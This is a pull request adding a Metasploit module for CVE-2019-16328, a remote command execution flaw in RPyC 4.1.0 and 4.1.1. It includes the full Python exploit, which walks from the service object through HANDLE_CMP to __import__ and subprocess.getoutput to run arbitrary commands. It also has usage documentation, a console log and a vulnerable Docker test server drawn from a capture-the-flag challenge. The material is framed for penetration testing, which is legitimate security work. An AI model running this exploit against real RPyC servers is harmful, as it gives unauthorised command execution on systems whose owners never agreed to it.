### PR TITLE
feat: created module to exploit CVE-2019-16328

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/rpyc_rce.md
+++ b/documentation/modules/auxiliary/scanner/http/rpyc_rce.md
@@ -1,0 +1,91 @@
+## Introduction
+This module automatically exploits a vulnerability to remotely execute code on
+RPyC servers running versions 4.1.0 and 4.1.1. The vulnerability allows a
+remote attacker to dynamically modify object attributes to construct a remote
+procedure call that executes code for an RPyC service with default
+configuration settings.
+
+## Vulnerable Application:
+
+RPyC servers running versions between 4.1.0 and 4.1.1.
+
+Link to vulnerable RPyC version:
+https://github.com/tomerfiliba-org/rpyc/releases/tag/4.1.1
+
+
+Link to Advisory:
+https://github.com/advisories/GHSA-pj4g-4488-wmxm
+
+## Options
+
+**RHOST**
+
+Configure the remote vulnerable system.
+
+**RPORT**
+
+Configure the TCP port of the RPyC server.
+
+**COMMAND**
+
+Configure the command to execute on the remote system.
+
+## Verification Steps
+
+1. Have exploitable RPyC server (example IP: 0.0.0.0):
+2. Start `msfconsole`:
+3. Do:  ```use auxiliary/scanner/http/rpyc_rce```
+4. Do: ```set RHOST 0.0.0.0```
+7. Do: ```set RPORT 18812``` (Set the remote port on which the server is accessible)
+8. Do: ```set COMMAND whoami``` (Set the command you want to execute)
+9. Do: ```run```
+10. Logs the output of the command you specified.
+
+
+## Scenarios
+
+Exploiting a vulnerable RPyC server located at 0.0.0.0:9999 with the command
+`whoami`:
+
+```log
+msf6 auxiliary(scanner/http/rpyc_rce) > set RHOST 0.0.0.0
+msf6 auxiliary(scanner/http/rpyc_rce) > set RPORT 9999
+msf6 auxiliary(scanner/http/rpyc_rce) > set COMMAND whoami
+msf6 auxiliary(scanner/http/rpyc_rce) > run
+```
+
+Demo example output for the module:
+
+```log
+msf6 > use auxiliary/scanner/http/rpyc_rce
+msf6 auxiliary(scanner/http/rpyc_rce) > show options
+
+Module options (auxiliary/scanner/http/rpyc_rce):
+
+Name     Current Setting  Required  Description
+----     ---------------  --------  -----------
+COMMAND  whoami           yes       Command to execute
+RHOST    0.0.0.0          yes       Target address
+RHOSTS   0.0.0.0          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasp
+loit/basics/using-metasploit.html
+RPORT    9999             yes       Target port
+THREADS  1                yes       The number of concurrent threads (max one per host)
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(scanner/http/rpyc_rce) > set RHOST 0.0.0.0
+RHOST => 0.0.0.0
+msf6 auxiliary(scanner/http/rpyc_rce) > set RPORT 9999
+RPORT => 9999
+msf6 auxiliary(scanner/http/rpyc_rce) > set COMMAND whoami
+COMMAND => whoami
+msf6 auxiliary(scanner/http/rpyc_rce) > run
+
+[*] Running for 0.0.0.0...
+[*] Connected to RPyC service at 0.0.0.0:9999
+[*] Executing command: whoami
+[*] Command result: nobody
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/scanner/http/rpyc_rce.py
+++ b/modules/auxiliary/scanner/http/rpyc_rce.py
@@ -85,11 +85,11 @@ def run(args):
         # Import the subprocess module and get a reference to it
         sp = imp('subprocess')
         # Get a reference to getoutput
-        system = _getattr(sp, 'getoutput')
+        remote_system = _getattr(sp, 'getoutput')
 
         # Execute remote command
         module.log("Executing command: {}".format(args['COMMAND']), 'success')
-        result = system(args['COMMAND'])
+        result = remote_system(args['COMMAND'])
         module.log("Command result: {}".format(result), 'success')
     except AttributeError:
         # If the target is not vulnerable, the above code will raise an AttributeError:

--- a/modules/auxiliary/scanner/http/rpyc_rce.py
+++ b/modules/auxiliary/scanner/http/rpyc_rce.py
@@ -1,0 +1,102 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+# standard modules
+import logging
+
+# extra modules
+dependencies_missing = False
+try:
+    import rpyc
+except ImportError:
+    dependencies_missing = True
+
+from metasploit import module
+
+
+metadata = {
+    'name': 'RPyC 4.1.0 through 4.1.1 Remote Command Execution',
+    'description': '''
+        This module allows remote command execution on RPyC versions 4.1.0 and 4.1.1.
+        You will be able to execute a specified command on the target machine as
+        the user running the RPyC service and view the output.
+    ''',
+    'authors': [
+        'Aaron Meese <@ajmeese7>',  # Metasploit module
+        'Jamie Hill-Daniel <@clubby789>'  # Original PoC
+    ],
+    'date': '2023-02-19',  # set to date of creation
+    'license': 'MSF_LICENSE',
+    'references': [
+        {'type': 'cve', 'ref': '2019-16328'},
+        {'type': 'url', 'ref': 'https://github.com/advisories/GHSA-pj4g-4488-wmxm'},
+        {'type': 'url', 'ref': 'https://gist.github.com/clubby789/b681e7a40da070713c3760953d8df1c3'}
+    ],
+    'type': 'single_scanner',
+    'options': {
+        'RHOST': {'type': 'address', 'description': 'Target address', 'required': True, 'default': None},
+        'RPORT': {'type': 'port', 'description': 'Target port', 'required': True, 'default': 18812},
+        'COMMAND': {'type': 'string', 'description': 'Command to execute', 'required': True, 'default': 'whoami'}
+    }
+}
+
+
+def run(args):
+    module.LogHandler.setup(msg_prefix='{} - '.format(args['RHOST']))
+    if dependencies_missing:
+        logging.error('Module dependency (rpyc) is missing, cannot continue')
+        return
+
+    try:
+        # Connect to remote host
+        conn = rpyc.connect(args['RHOST'], args['RPORT'])
+        module.log("Connected to RPyC service at {}:{}".format(args['RHOST'], args['RPORT']), 'success')
+    except Exception as e:
+        logging.error('{}'.format(e))
+        return
+
+    # Get a NetRef to the service
+    conn.root
+
+    def call_method(object, method, arg):
+        # The remote will handle this with
+        # `getattr(type(object), method)(object, arg)`
+        return conn.sync_request(rpyc.core.consts.HANDLE_CMP, object, arg, method)
+
+    def _getattr(object, name):
+        # Call the internal __getattribute__
+        return call_method(object, '__getattribute__', name)
+
+    def _getitem(object, name):
+        # Call the internal __getitem__
+        return call_method(object, '__getitem__', name)
+
+    try:
+        # Retrieve service's class
+        the_class = _getattr(conn._remote_root, '__class__')
+        # Retrieve a reference to a function in the class
+        a_func = _getattr(the_class, 'get_service_aliases')
+        # Get the function's 'globals'; i.e. the Python globals
+        globals = _getattr(a_func, '__globals__')
+        # Retrieve a reference to the builtins module
+        builtins = _getitem(globals, '__builtins__')
+        # Retrieve a reference to the import function
+        imp = _getitem(builtins, '__import__')
+        # Import the subprocess module and get a reference to it
+        sp = imp('subprocess')
+        # Get a reference to getoutput
+        system = _getattr(sp, 'getoutput')
+
+        # Execute remote command
+        module.log("Executing command: {}".format(args['COMMAND']), 'success')
+        result = system(args['COMMAND'])
+        module.log("Command result: {}".format(result), 'success')
+    except AttributeError:
+        # If the target is not vulnerable, the above code will raise an AttributeError:
+        # "AttributeError: cannot access '__getattribute__'"
+        module.log('Target is not vulnerable.', 'error')
+        return
+
+
+if __name__ == '__main__':
+    module.run(metadata, run)


### PR DESCRIPTION
This PR introduces a module to exploit CVE-2019-16328 and achieve remote command execution on the vulnerable server.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use auxiliary/scanner/http/rpyc_rce`
- [ ] `set RHOST 0.0.0.0`
- [ ] `set RPORT 9999`
- [ ] `set COMMAND cat flag.txt`
- [ ] `run`

## Vulnerable Environment

A vulnerable test environment can be spun up with the environment from [here](https://github.com/dicegang/dicectf-2023-challenges/tree/main/misc/pike).

`Dockerfile`:

```shell
FROM python:3.11.1-slim-bullseye
WORKDIR /app
RUN pip install --no-cache rpyc==4.1.0
COPY server.py flag.txt ./
USER nobody
CMD ["python", "server.py"]
```

`flag.txt`:

```
this is an example!
```

`server.py`:

```py
#!/usr/local/bin/python

import rpyc
from rpyc.utils.server import ThreadedServer

class CalcService(rpyc.Service):
    def exposed_add(self, l, r):
        return l + r
    def exposed_sub(self, l, r):
        return l - r
    def exposed_mul(self, l, r):
        return l * r
    def exposed_div(self, l, r):
        return l / r

if __name__ == "__main__":
    server = ThreadedServer(CalcService, port=9999)
    server.start()
```
